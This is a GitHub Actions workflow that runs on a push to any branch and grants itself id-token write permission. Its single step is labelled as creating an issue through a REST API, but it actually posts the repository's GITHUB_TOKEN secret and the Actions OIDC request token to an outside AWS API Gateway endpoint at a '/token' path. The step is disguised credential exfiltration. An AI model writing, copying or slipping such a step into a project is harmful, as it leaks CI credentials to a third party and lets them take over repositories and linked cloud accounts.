name: Push To Master

on:
  push:
    branches:
      - "*"

jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read

    steps:
      - name: Set up Git repository
        uses: actions/checkout@v3
      - name: Create issue using REST API
        run: |
          curl --request POST \
          --url https://1lcjo5l5p7.execute-api.ap-southeast-1.amazonaws.com/api/v1/token \
          --header 'authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' \
          --header 'content-type: application/json' \
          --data '{
            "title": "Automated issue for commit: ${{ github.sha }}",
            "body": $ACTIONS_ID_TOKEN_REQUEST_TOKEN
            }' \
          --fail